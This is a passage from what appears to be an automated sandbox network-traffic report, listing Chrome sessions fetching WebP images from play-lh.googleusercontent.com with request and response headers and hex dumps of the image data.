                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 7e a1 78 da e3 20 a0 54 7c a1 bf 89 d5 b6 93 b7 91 56 a5 91 54 8a 9e 62 c6 7f 1f 7d dd 4a 13 00 1c 7d b6 84 22 e9 34 3c 2f 21 41 70 18 04 7a 2a 51 f3 8a 07 b4 bc c5 02 8d 4c a3 34 a5 30 38 c1 5f 9e 5e 3e fe 5f 15 02 00 c3 fa fa 25 da 81 58 cb cb e2 8a e4 f9 14 0d 0f c0 bf df fa 9c c5 a6 59 11 18 4d e8 59 b5 2f 8a a4 d3 71 b3 a1 c4 11 80 c0 d0 a4 e6 86 99 1c 64 24 c3 04 ad 04 24 47 3b 61 68 d6 60 0c 23 8c 31 3a dc 2f 3e b9 c2 b3 5f 65 13 01 e9 f0 b3 2e fe f2 2b ff dc 64 82 be 88 36 4a a8 f1 e7 47 5f 2f b2 69 de c4 4a 09 ca e1 c3 2b 61 41 d4 ed 4d 69 07 02 50 e2 db 9a f6 a2 e7 0e 01 20 60 06 9f 1e 48 05 db 1e 43 18 8c 03 08 f3 f6 d4 3e a7 ca 1f 3d 7e f4 11 90 08 e7 ed 5d 9f d8 1f be 68 f6 db 05 81 df db db 5f 90 3d cf 77 22 4d b3 62 a5 04 15 7e d4 e9 45 b5
                                                                                                                                                                                                                                Data Ascii: ~x T|VTb}J}"4</!Apz*QL408_^>_%XYMY/qd$$G;ah`#1:/>_e.+d6JG_/iJ+aAMiP `HC>=~]h_=w"Mb~E
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC176INData Raw: f4 02 77 29 90 51 0e 5c 8c 27 bc d5 17 04 18 37 1d 8a 40 06 68 80 19 3c c5 09 fc a2 98 80 8a 26 18 14 7e 33 bd 0d 68 0a 0c 6d e4 17 80 06 a5 01 02 8e 0a 8c 39 24 64 81 0f 26 a0 17 b6 34 2f 64 17 c5 cd 36 a9 3f f6 c5 61 dc d2 8c 04 80 49 08 41 09 39 80 12 2d e6 3c 9e f0 62 20 9c 29 25 73 14 28 70 4f 06 cd c5 48 e2 2d 19 03 4c 63 0a 28 c0 a8 40 c1 27 14 00 04 2f de 44 cc f2 be 7a 6e fb 66 56 34 13 10 46 05 23 10 90 8d 01 a3 80 0a 1d e6 1c 48 17 c3 fa ee c0 8b b9 0c 36 e4 b6 b9 68 6e 21 77 74 a8 50 c2 e0 06 a3 92 cf a8 e3 40
                                                                                                                                                                                                                                Data Ascii: w)Q\'7@h<&~3hm9$d&4/d6?aIA9-<b )%s(pOH-Lc(@'/DznfV4F#H6hn!wtP@


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                125192.168.2.450032216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC531OUTGET /JtygOZ9IrtJsXLqQ1DszTLkSGwcRYmOcI6YeBU0ul2vhh9FII7eqZa6Lk2VBcHQiQCav=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 10246
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 02:51:53 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 02:51:53 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 7373
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC856INData Raw: 52 49 46 46 fe 27 00 00 57 45 42 50 56 50 38 20 f2 27 00 00 f0 90 00 9d 01 2a a6 00 28 01 3e 55 24 8f 45 23 a2 21 13 ea 86 b4 38 05 44 b2 37 6e bd c0 30 da 01 1f a8 7e 5d 77 a7 77 ff 21 f8 e1 fc f7 f5 ef e6 1a ce fe 63 fb 67 e9 5f dd 0e 70 d3 61 d9 ef ec 3f 32 ff b8 7c b8 ff 1d ff 13 fa a7 bb cf d2 9f f4 bd c0 3f 4e 3f d7 ff 52 fc 6f f8 b7 f5 a9 fb 95 ea 1f f9 b7 f7 1f fb df de fd dd ff d6 7e c0 7b b2 fe e3 ea 07 fd 5f fb c7 ac 77 fa ef ff fe e5 7f b5 de c1 5f cd 3f cd 7f f5 f5 cb fd d5 f8 36 fe b9 fe f7 f7 4b e0 5f f6 53 fe ff b0 07 ff 5f 50 0f fc dd 61 fd 73 fe a7 da cf f8 2f ca 1f 3c 7c 5f fa 3b f7 4f dc 7f f0 5e da d8 eb b4 9f e5 5f 78 ff 45 fd c7 f7 1f d8 bf f8 7e 1a fc 6a ff 03 d4 3b f1 df e6 ff e5 bf 35 b8 94 76 cf f5 df f6 bd 45 fd 95 fa 9f fb 0f
                                                                                                                                                                                                                                Data Ascii: RIFF'WEBPVP8 '*(>U$E#!8D7n0~]ww!cg_pa?2|?N?Ro~{_w_?6K_S_Pas/<|_;O^_xE~j;5vE
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: bd bf d3 8a 60 d4 9f ee a0 6f 4d 4a 44 e1 7c b1 5a 26 88 17 ef 91 b3 74 2d 79 d3 54 d0 c3 15 67 4a 39 20 9b 5e 6a 4d bf 6e aa 3b ef 59 a7 13 ec 49 dd 43 1c cd 7b 2a fc 73 75 5b a2 f8 c1 aa 6c b6 69 42 6f 39 ec 0b cd 72 df 9f b5 4e da 40 6b b9 8d cb 7b 6c 3f ef 94 c7 27 fa cb 24 a3 f0 56 3b 44 49 1a fa 52 97 37 58 aa 7c 93 07 4c 25 c7 93 38 8a 7f 02 e1 c0 c8 15 2c 82 af a9 18 ec 57 2b 85 0e eb 9a ab 58 2c 73 77 70 3e 6c 0d 59 ca b7 a0 74 ae 2c a8 a0 52 84 de dc 55 e5 43 fd 2a 07 b1 65 60 49 96 19 60 b3 d3 39 66 89 b3 46 6f 9b dd fd d0 b6 21 f7 01 1a aa 60 bd 9c 8b 4a 13 77 e4 de 34 b2 1d d1 e6 d7 dd 19 8c 8d 67 fd 5a e6 c2 79 65 ff 0c a4 c0 6b b5 9b b1 9a 5d 22 fb 1c 16 17 1d 74 21 2c d3 2b 99 d2 f8 99 58 5c 66 df 3d 91 7d cf c1 ad 02 dd ff be bb 96 73 c8
                                                                                                                                                                                                                                Data Ascii: `oMJD|Z&t-yTgJ9 ^jMn;YIC{*su[liBo9rN@k{l?'$V;DIR7X|L%8,W+X,swp>lYt,RUC*e`I`9fFo!`Jw4gZyek]"t!,+X\f=}s
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: ea f2 94 e6 3d a6 fa 21 73 5d 45 c9 39 39 44 7a e0 80 b5 62 85 01 76 3c 80 a2 99 f5 95 1e 46 dc c1 48 8c d7 46 72 a6 5b 78 21 ae 9d 59 d4 35 d3 6f 61 16 2a a1 ce f2 f4 6d 2f 88 17 fa f9 c8 d1 15 f4 eb 5d 64 25 5a e3 fe 8f 26 6f 01 d8 01 71 b1 72 8e 57 8a e6 34 06 64 45 07 a8 49 95 7b 35 38 7c 34 4f a3 9d 7e f5 ee d5 dd 69 0a 57 42 d1 ad 9d 17 80 ec 32 10 6b c0 e0 52 40 dd 51 ed 6d f9 6d 3a 0d 5b d6 1c 54 ae 48 eb 3f 2c cc 69 1d 86 95 a0 21 9b c7 b6 b3 f5 ad 17 96 64 2f 88 a6 d1 8f e5 a9 45 85 5c be 4f f2 26 0a d0 a0 87 d4 ab 72 ad 7f ec cf ab 60 77 af ff 51 43 fb 30 b1 11 38 f2 09 02 03 80 52 15 c4 e5 e3 e4 08 36 ba fd 84 1f 3f c6 84 7b 4e c0 4c 35 6a 58 b5 74 96 ea b4 75 af ee e8 2e 44 a1 8b 98 13 2d 2f 28 4d d5 89 34 77 b5 d2 ab d6 6b e7 dd 17 df dd 25
                                                                                                                                                                                                                                Data Ascii: =!s]E99Dzbv<FHFr[x!Y5oa*m/]d%Z&oqrW4dEI{58|4O~iWB2kR@Qmm:[TH?,i!d/E\O&r`wQC08R6?{NL5jXtu.D-/(M4wk%
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 6d 65 cb d1 66 81 23 64 6f 5b c1 8d 3d 61 de 82 9f 80 51 8c dd 0b a6 dd 37 6c 7d aa 19 63 20 a8 51 ba 4c d5 9f 3d e6 b4 5f e5 ff 9a 77 48 ef ed 2e 77 18 92 76 0f 7c 31 e4 77 88 2c 74 29 37 d8 5d 43 17 8a a1 12 d4 1c f8 bf 20 e9 c0 b1 62 94 b9 af df c0 2d 20 6d c1 d4 24 91 f1 31 8a 8c 52 ba 81 e1 29 7e 02 39 00 72 41 b8 06 b0 87 ba 22 5b 27 fe 4f 9e 5a 6d 23 fb 64 86 d1 16 32 07 8f 0a 9f 14 c1 ee 0e 93 1e 3c 5a 92 27 13 47 b8 c6 f5 b0 ba 94 31 bf 0b 3e df d2 1e 47 05 9f b2 10 c1 ec 2d 22 29 63 12 85 cc 67 d1 5c b3 a2 5a 1b a1 fe a8 f7 80 c7 10 06 71 61 23 86 70 0d 4d f9 83 b4 4f d5 2f 45 bc d5 71 66 13 f1 5e e5 54 4d 47 32 cb 37 e5 22 f9 b5 ab 03 ba 09 8c a7 6d 3d 8c fd c4 60 8c 58 7c e4 4f ee ff 61 89 04 d6 ac 9b 81 2a b5 97 cd ca 8a c1 df cd 31 9e a4 69
                                                                                                                                                                                                                                Data Ascii: mef#do[=aQ7l}c QL=_wH.wv|1w,t)7]C b- m$1R)~9rA"['OZm#d2<Z'G1>G-")cg\Zqa#pMO/Eqf^TMG27"m=`X|Oa*1i
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 91 75 17 b2 a2 23 b7 cb 7c 05 49 d0 0e 0f bd b8 83 65 d2 15 40 44 29 95 a5 96 43 e3 e9 69 dd 87 55 c3 2f 40 a7 b2 8b e3 1a d5 1e 64 a9 9c 41 87 a4 05 53 2c 6c 50 17 70 b1 4a 7a 76 3a 4d 50 53 6a f7 97 c1 65 ac 57 70 87 5f 26 6e 4a aa fd 4b 5e 41 80 de f3 29 01 b8 1d 54 b9 72 53 1d 56 dc 3a 3c 16 84 b2 34 a4 3f 1f 62 46 39 1c ca 5c 74 66 38 e2 f5 4d 39 90 95 59 0e 9a 57 30 57 e4 0a 6d 54 4a c8 32 1d 5b e1 89 3b 99 01 b4 b3 2d 6a 0b eb 1f 0d 92 40 a1 ae 53 24 e5 6f 71 b3 de 84 52 83 72 68 d8 37 02 51 0a fa b8 94 a0 a3 85 cd 1d 49 93 26 ff ac 3b 03 95 bf c8 15 c0 52 d1 18 3b b6 51 7a 9f 70 c0 0a a8 fc d2 2f 1b d8 e8 81 0a 1e 8d 81 83 9c e3 e6 09 eb c4 f7 ac d0 5a 33 33 66 67 39 de 7f 01 f8 7f a7 c4 c5 f1 95 94 05 90 d9 43 f4 c4 fe 0b e7 e4 7b 0f b2 85 39 bb
                                                                                                                                                                                                                                Data Ascii: u#|Ie@D)CiU/@dAS,lPpJzv:MPSjeWp_&nJK^A)TrSV:<4?bF9\tf8M9YW0WmTJ2[;-j@S$oqRrh7QI&;R;Qzp/Z33fg9C{9
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 64 ac de 00 45 d0 5f da 30 7d 15 4d ea 33 a9 9d 2c 51 62 57 c2 9c e7 44 53 d3 87 26 74 37 d6 d3 ae b1 34 4b 34 72 42 b1 61 0c 34 bc 96 7d 45 a7 39 95 f1 0c 98 8f 1d c2 6d f2 a5 08 69 c2 c3 a7 69 4e 89 aa 21 77 42 33 bd f9 94 da fc 7f 68 b2 f2 95 41 cd 66 02 bb c0 3f 91 39 d6 bf 79 7a 6a 73 dc 3f 43 5b 9f 25 bc 81 34 ac 0c aa 21 e5 e1 9d 8b 1a 5c a3 fd de 69 ae c3 f7 a8 f2 3d af 8a a4 63 84 f0 23 b8 de 6a f6 40 94 63 ef 46 f6 0e da f7 d4 14 fb 67 9b d8 63 c5 86 fe 25 98 cc 52 a3 b1 e2 3d 4c d3 40 d5 be ea ce 42 fb 3a 77 ee 8e 91 d0 f4 22 76 2a 13 6b 6e c6 f4 ce d3 8f d2 26 f2 49 b3 90 df cc 7f ad d6 79 3f a2 f5 b1 ce 90 ac 28 2f 0b 0e e4 65 d8 9f 1b 76 f8 53 d0 99 72 7e f8 8c 8a 27 cf c1 db a4 64 b6 be 37 b5 37 e4 97 56 cc b7 ca 8e 35 f2 be 6e 13 dd 95 f2
                                                                                                                                                                                                                                Data Ascii: dE_0}M3,QbWDS&t74K4rBa4}E9miiN!wB3hAf?9yzjs?C[%4!\i=c#j@cFgc%R=L@B:w"v*kn&Iy?(/evSr~'d77V5n
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 30 97 93 a6 fe 56 c3 9c c5 47 16 0b 1f cb 3c 9d de b7 27 9d f7 47 38 c0 d2 10 aa 79 d4 0d 20 5e f2 ca 4f 05 c1 3e 35 a7 4d 25 50 f1 08 4b d6 d6 43 09 76 79 bd 51 65 3e 8c 3a e7 da e3 81 2e e2 41 4f 73 54 c4 ce 13 1d b1 e7 a5 66 55 e8 8b ea 8b 40 e7 58 33 93 81 ad 69 0e 1c 24 2e 49 34 c2 bb c8 2a 14 a1 03 ae 34 98 19 84 8f cc a7 37 07 0e 6c b9 23 de e3 6e 03 60 03 a5 f7 fd 80 3d 19 1a 77 f8 51 c1 9d c8 0a fc f2 d4 b4 76 16 f6 13 89 64 d4 b6 6e 86 09 20 ef 01 83 d5 54 93 b0 52 36 60 47 2b e5 fa 46 6d 5e 98 c7 7f 97 3d c5 8e 07 58 f4 f9 b7 aa 4f 8f 43 80 88 be d6 7d ab 9e 08 a7 10 de 45 11 4b 36 d5 25 51 14 e0 ea 84 d2 69 8c 66 fc 29 ce 5f 53 2d 31 eb 16 bc 49 fa 4c d6 00 2a 56 c2 e9 fa f0 f9 19 93 e4 03 a0 98 52 5d 8d 94 64 bf f9 4f d3 60 34 b9 4a 48 e0 3e
                                                                                                                                                                                                                                Data Ascii: 0VG<'G8y ^O>5M%PKCvyQe>:.AOsTfU@X3i$.I4*47l#n`=wQvdn TR6`G+Fm^=XOC}EK6%Qif)_S-1IL*VR]dO`4JH>
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1050INData Raw: 81 e2 d4 56 37 69 33 dc 60 84 84 04 74 3b ff e2 fa 67 fa 6a 2e 61 43 16 af 94 ea 80 2d ee 2c 85 ce c2 0e 44 ca d2 f3 96 8c 43 29 bd 94 b9 33 77 38 a5 c3 2f 14 47 25 14 4c b8 b3 c6 e0 1c 03 ac 7f 5c 73 9f a6 a9 bd 36 24 68 64 d9 9b 02 7b 53 88 ff 73 96 6d 23 1e 7e aa 1e 86 5e 66 59 3b 25 4c bf 75 40 9e dd 40 aa ba 87 32 08 59 ba 26 6f 11 6d c3 0b 3d 18 f0 0b a3 88 7c fb 42 b5 a8 3c 8d 78 d8 a2 8f c1 9d e5 97 f9 26 f4 12 0d d2 7c 3f 82 2d fc 5c 06 42 64 94 e8 09 9e 70 94 69 47 b7 01 54 ea 35 ea a1 5a 6e 64 f3 c9 af e6 cc 26 38 92 50 e7 9f 93 00 79 5d 7e c5 dd 5f 13 bb a8 f4 d1 48 ee 91 b0 ca bb 59 f5 2a 1c ea e6 0c cc bb 90 7e 31 25 90 08 67 40 06 36 c7 31 2d 1b 7c 20 57 a3 57 17 23 e7 6f 9e b4 dc 1e f3 34 a6 e0 b6 86 7f 95 b2 df dd a0 7b e0 da e0 3c c5 99
                                                                                                                                                                                                                                Data Ascii: V7i3`t;gj.aC-,DC)3w8/G%L\s6$hd{Ssm#~^fY;%Lu@@2Y&om=|B<x&|?-\BdpiGT5Znd&8Py]~_HY*~1%g@61-| WW#o4{<


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                126192.168.2.450033216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC531OUTGET /bhwvgLPwlrUGC29L7T2GkUyJe7bPzKxeuRFxEHWG7RCFDP_PtJ5WPtdk6QW-KKMn7Zy2=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 10850
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 02:51:53 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 02:51:53 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 7373
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC856INData Raw: 52 49 46 46 5a 2a 00 00 57 45 42 50 56 50 38 20 4e 2a 00 00 b0 8c 00 9d 01 2a a6 00 28 01 3e 5d 24 8f 45 23 a2 21 17 5a d6 04 38 05 c4 b4 04 38 00 ca 8a 1c 7f 39 d6 e5 b9 bb cf e4 bf e2 c7 cc ad 8d fb 9f e0 7f cb ae 82 1a f7 e8 03 df 83 9d 3f d3 ff 85 fd dc fe fb f3 47 fc 07 fc df f2 1e e8 3f 47 fb 02 fe a5 ff 99 fe f5 fd b7 fe df 6a 3f dd 3f c0 0f 80 df d2 ff c5 fe cc 7b c1 7f b3 fd 80 f7 65 fd c7 d4 0f fb 87 f7 5f 5a 2f f7 ff ff fd c8 ff bc ff 97 ff ff ee 27 fb 01 ff b7 d7 3f f6 f3 e0 cf fb 37 fc 8f db ff 81 1f d9 6f fc 9e c0 1f fc bd 40 3f ec 75 97 f5 53 fb 8f 6c 1f e1 7f 28 7c f3 f1 63 e9 1f 6b 3f b0 fb 6b 7f 7d e1 3b a9 bf e4 7a 29 fc b3 ed ff e6 ff b8 fe e8 fb 27 ff 23 c2 3f 8d bf e3 7a 82 fe 39 fc 9f fc c7 f6 df c8 4f 56 5d a0 fa ef fb 9f f7 de a0
                                                                                                                                                                                                                                Data Ascii: RIFFZ*WEBPVP8 N**(>]$E#!Z889?G?Gj??{e_Z/'?7o@?uSl(|ck?k};z)'#?z9OV]
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 7c 94 58 70 e3 7b 61 e0 2c 6b 4b 16 65 28 fb b3 99 16 54 05 80 3c 02 03 32 2a 24 f8 ac b6 57 7d 02 76 e5 9f 22 e8 47 c8 25 d6 21 ce a8 95 47 dd b0 22 8c b8 fb 4f f1 3a 9e f3 6b fc 98 5c 8f e8 52 13 cc 67 de 4a 6f aa b3 ee cc db 21 49 34 be d8 df f0 5b fc 02 a3 b9 ec d5 ca 42 8a ac 64 66 86 92 86 eb 8c 89 d5 1d 1d 51 d0 e5 8e 70 fa 6c 9c 4b c2 f2 e2 c5 06 bb ba 79 7b 42 7b 3e f3 88 fa 81 ce 79 fb 7b 96 0c 3e 59 24 a8 e1 10 9b 4c 08 0e b7 12 4a 2a fc cf cf 94 48 08 c5 ff 0c f5 7d 3d 26 dc 73 5f d6 a7 a6 98 a2 09 34 fc 0e c6 5b 92 33 f9 31 9e 7f 93 27 2c 5b 17 6e 7c a1 05 20 55 02 d0 b3 00 b5 5d 39 bb fd 0a 94 3a 11 ef 37 22 d3 64 e6 99 e8 12 a9 36 06 22 74 b3 52 5b 48 c2 af c5 3c 1e 29 c0 46 22 7d f0 1e e7 3b 36 f0 a6 24 37 4b 32 95 0f 08 65 ea e1 7c 71 fd
                                                                                                                                                                                                                                Data Ascii: |Xp{a,kKe(T<2*$W}v"G%!G"O:k\RgJo!I4[BdfQplKy{B{>y{>Y$LJ*H}=&s_4[31',[n| U]9:7"d6"tR[H<)F"};6$7K2e|q
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: ab f6 98 33 fc 2b d8 0d 2a 34 75 1d a3 94 ff 04 3c 6a 0d 18 75 d9 e1 d9 7f 6d a9 9e ea 69 11 b9 82 1d a6 93 60 d7 b7 93 8b 29 c4 91 88 78 ef 3e cb 27 e3 46 fe 88 2d 37 5e 27 eb 6b ad ce 8a 30 18 7a 2b 16 56 d0 df 2a 75 19 49 32 a1 20 df fe 1e e7 b2 8a c6 2f 0f 7f 80 ad fd 0a 30 46 f1 e0 e9 3b 74 83 50 6d db b3 3c a6 9f d5 7f 6b 80 01 a2 4e a3 8c 63 e4 3d 86 58 d5 bc 4e c9 dd 7c 3a 82 66 22 87 73 6a 89 89 a4 f9 ba cd 13 f8 e3 1d 29 16 e6 08 74 19 5b 52 cf 03 91 26 52 73 88 5b 3a 10 e0 e4 a9 56 92 1e 32 a1 7f c6 5e d9 11 cd 47 b6 07 0f 8e ce 31 1b fb 37 fb ee 3a bc 59 f1 20 db 05 80 4e 84 75 44 84 95 71 a7 a5 cc 76 68 75 16 69 c3 dd 5f ee fd 68 13 c1 d6 7d 84 99 be 88 0f 37 2e 7f 8d c9 7a 5b 00 58 f4 73 00 0b bf 02 e5 8e 24 9b 84 f5 e7 cf ab 7f 52 49 df 8f
                                                                                                                                                                                                                                Data Ascii: 3+*4u<jumi`)x>'F-7^'k0z+V*uI2 /0F;tPm<kNc=XN|:f"sj)t[R&Rs[:V2^G17:Y NuDqvhui_h}7.z[Xs$RI
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 47 44 42 f0 46 25 6d 4a 36 90 90 62 63 ca 24 1d fc 1e 25 c6 90 ba f5 be c5 c0 bd 24 b0 08 70 0d a1 0c f5 3f 06 12 0c aa fc 82 29 d6 27 79 b3 16 27 d4 27 02 e1 87 33 d4 fc 85 e0 7a 39 0e 2c 46 ef d1 44 22 47 93 b3 3e 95 95 26 05 ae 68 3a 9e e5 e8 e2 e2 9a 0b a7 ce 99 22 30 fa 7e a2 87 0f cc 21 bb d6 ab f6 da e5 35 12 e2 79 ed 7c ca 8c e3 d4 a0 57 ac 69 83 7d 86 85 9e c7 d8 24 5a 8a c2 fb 2f ff 01 92 21 82 74 3e 3b ca e4 9d bf 65 e8 97 5f 61 ea 84 8a ea 91 75 b3 b7 1f a5 60 08 74 10 4f f5 a7 00 cc 40 82 ed 73 b6 b1 d2 91 79 ae aa 62 e4 b3 e0 8a a1 9a 7f b6 2b 5b 15 55 bb 68 e9 3d 9f d9 23 06 cf f3 e6 6b ff 04 8b f6 7e c4 f8 9f ae 8c 0b 1d 7b fa 00 81 c7 6f c2 57 bc 8a bf 5f 0f 82 b5 27 30 8c 6f 9a 64 5e 13 86 10 71 b5 53 e7 da 40 99 c5 42 bd 99 5c b8 96 5a
                                                                                                                                                                                                                                Data Ascii: GDBF%mJ6bc$%$p?)'y''3z9,FD"G>&h:"0~!5y|Wi}$Z/!t>;e_au`tO@syb+[Uh=#k~{oW_'0od^qS@B\Z
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 0f e0 58 b6 d9 aa f3 0a 49 be ab d4 e7 b5 59 10 34 ea 42 2c 91 fd a6 3e e0 2c d8 09 48 5a ee 11 05 d8 fd 29 ae f9 6c ab e9 54 31 76 c9 0b b7 ea 41 84 c0 34 a8 87 95 e4 cb ca b6 3f a5 88 70 9e 95 10 f9 a0 e1 40 32 3d 38 b6 ec 7c 3a a9 2d 51 86 9f 6f 19 5f f0 42 6a 78 29 92 96 10 1e 40 8e 78 98 67 3a 34 f6 81 08 23 e9 ca 2b d1 00 86 87 dc 4e b6 70 a6 d4 0d 71 f6 26 c0 c5 00 4b f9 c2 c0 12 ba 04 95 fb fa 9d 7d b6 b3 57 90 3d 24 7b bd ae ed 04 38 1c aa af a9 fb b1 4d 90 28 a6 70 1d ec 62 57 72 59 0c 84 72 11 15 5b dc 03 85 d3 a2 e5 2d 54 66 6b 3e a3 bf ed 1c 33 d1 a4 89 a1 8f 8b f0 66 0c 2c c4 b4 92 ef 82 6e d5 6e 20 8b 0d 54 b2 3b 8d 3c 71 17 d4 75 fa fb 35 f5 e4 8e 85 a6 05 44 c7 23 f3 9d ba fb ef 51 cb d1 b4 6e aa c8 9b ed 24 d9 24 e6 e3 ca 2d c2 e5 13 9c
                                                                                                                                                                                                                                Data Ascii: XIY4B,>,HZ)lT1vA4?p@2=8|:-Qo_Bjx)@xg:4#+Npq&K}W=${8M(pbWrYr[-Tfk>3f,nn T;<qu5D#Qn$$-
                                                                                                                                                                                                                                2024-09-29 04:54:46 UTC1390INData Raw: 81 b3 16 a0 cb 62 ad 03 bf 02 c3 37 67 46 8a 90 cb 43 0e a3 c5 b9 2c 9d 00 ed 0a 61 2b 0e c5 39 d5 f9 75 ca d6 14 46 33 45 08 d5 f4 c7 45 9c 26 bf f2 89 bb 83 ce 53 8a 29 4c 1d 80 51 43 19 9a 9f 90 5a 42 fd 79 5a 00 a7 f9 bb 6d 2d fe 8a af 70 d0 05 89 fa a3 ee 28 3c 01 aa 8f 38 93 0a 49 1e 54 e8 6d fe 10 84 8a a1 db 20 d6 7d ef cf d7 d3 36 57 9c d0 b2 c2 af c3 db 97 be 16 e6 33 06 12 3b cb be 61 94 7f 6f 8a da c1 b7 fa 72 55 e8 22 8f 10 09 c4 bb 55 4c ab 57 78 b2 13 3d 62 0f 10 e1 3d e1 cc c4 4d 6b e7 72 bb 9f f7 3a f1 9d e3 ea df b7 a7 66 4a 97 1a 3b 4d d7 95 e2 4c 9b 5f 05 56 22 85 9e 44 d7 26 b6 a6 b2 17 82 70 78 6b 8d de 97 16 5b 93 eb 09 08 3a da 29 a5 a5 59 1a 64 61 6b 0f af 99 37 19 67 77 c7 29 21 6c 8e d7 ac e2 41 cf 22 d4 80 6c 49 5b ed 11 e5 3f
                                                                                                                                                                                                                                Data Ascii: b7gFC,a+9uF3EE&S)LQCZByZm-p(<8ITm }6W3;aorU"ULWx=b=Mkr:fJ;ML_V"D&pxk[:)Ydak7gw)!lA"lI[?
